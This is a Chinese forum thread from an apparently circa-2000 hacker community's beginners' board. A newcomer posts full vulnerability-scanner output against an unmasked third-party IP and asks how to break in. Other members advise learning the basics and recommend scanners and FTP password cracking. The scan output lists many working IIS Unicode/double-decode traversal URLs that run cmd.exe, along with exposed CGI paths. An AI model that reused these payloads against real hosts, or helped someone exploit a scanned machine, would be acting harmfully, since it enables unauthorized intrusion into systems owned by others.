20CN网络安全小组第一代论坛
发表新主题  发表回复

个人资料 | 社区目录 用户登录 | | 论坛搜索 | 常见问题 | 论坛主页
  下一个最老的主题   下一个最新的主题
» 20CN网络安全小组第一代论坛   » 安 全 基 地   » 菜鸟乐园   » 我扫到漏洞但我不知道怎么做!

   
作者 标题: 我扫到漏洞但我不知道怎么做!
错过的爱
未注册


图标 5  发表于         编辑/删除帖子   引用原文回复  
:-)h0les Scanner:-)

扫描目标:202.xxx.xxx.xxx

扫描选项:
FTP漏洞
SMTP漏洞
FINGER漏洞
CGI漏洞
IIS漏洞
SQL_SA_NULL漏洞
RPC漏洞
NTUSER漏洞

开始扫描......

目标IP地址为:202.107.245.1

扫描目标主机开放的端口:

21号端口(ftp)开放!

70号端口(未知)开放!

80号端口(未知)开放!

135号端口(未知)开放!

139号端口(nbsession)开放!

1433号端口(未知)开放!

开始扫描FTP漏洞:

FTP服务器的Banner:
220 qzdxweb1 Microsoft FTP Service (Version 3.0).

测试匿名用户

530 User anonymous cannot log in.

根目录列表:
530 Please login with USER and PASS.

尝试改变主目录属性为可写:
530 Please login with USER and PASS.

尝试建立目录:
530 Please login with USER and PASS.

尝试执行Shell:
530 Please login with USER and PASS.


开始扫描SMTP漏洞:

目标没有开放SMTP服务...


开始扫描FINGER漏洞:

目标没有开放FINGER服务...


开始扫描CGI漏洞:

WWW服务器的Banner:
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Sat, 23 Sep 2000 16:43:37 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 26 May 1998 07:45:26 GMT
Content-Length: 138


开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...

发现/_private漏洞

发现/_vti_bin/shtml.exe漏洞

发现/_vti_bin/shtml.dll漏洞

发现/_vti_inf.html漏洞

发现/cgi-bin漏洞

发现/cgi-bin/imagemap.exe漏洞

发现/cgi-bin/htimage.exe漏洞

发现/msadc/msadcs.dll漏洞

发现/scripts/tools/getdrvrs.exe漏洞

发现/scripts/tools/dsnform.exe漏洞

发现/scripts/tools/mkilog.exe漏洞

发现/scripts/tools/newdsn.exe漏洞


开始扫描IIS漏洞:

WWW服务器的Banner:
HTTP/1.0 200 OK
Server: Microsoft-IIS/3.0
Date: Sat, 23 Sep 2000 16:45:43 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Tue, 26 May 1998 07:45:26 GMT
Content-Length: 138


开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待...

发现/scripts/..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/msadc/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/_vti_bin/..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/_vti_bin/msadc/..%252f../..%252f../..%252f../..%252f../..%252f../..%252f../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\漏洞

发现/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\漏洞

开始扫描SQL_SA_NULL漏洞:

----SQL_SA_NULL SCANER for Windows NT/2K/9X--Author by HORSE_B(Send all feedbacks and bug report to bhorse@cattsoft.com)

这台机器的洞蛮多的。我是新来的。请高手帮忙!!

IP: 已记录
朗月清风
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
还是学基础吧!
IP: 已记录
video
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
呵呵你用是扫描器不好!我用过它
楼上是朋友说的对
学基础吧
IP: 已记录
错过的爱
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
基础应该学些什么呢?各位大佬 们!!可以说说吗?
IP: 已记录
错过的爱
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
我差点忘了。用什么扫描器最好呢?谢谢了!!!
IP: 已记录
video
未注册


图标 1  发表于         编辑/删除帖子   引用原文回复  
SFind V1.85
还可以挺方便的
但是扫cgi还可以
破ftp的时候笑死了
我设置密码就是“ab”我去了趟wc
都破到6位了还没有破好
IP: 已记录

 
发表新主题  发表回复 关闭主题 突出主题 移动主题 删除主题 下一个最老的主题   下一个最新的主题
- 适于打印的主题视图
转到:
联系我们 | 20CN网络安全小组

Powered by Infopop Corporation
UBB.classic™ 6.5.0
NetDemon修改版 1.5.0, 20CN网络安全小组 版权所有。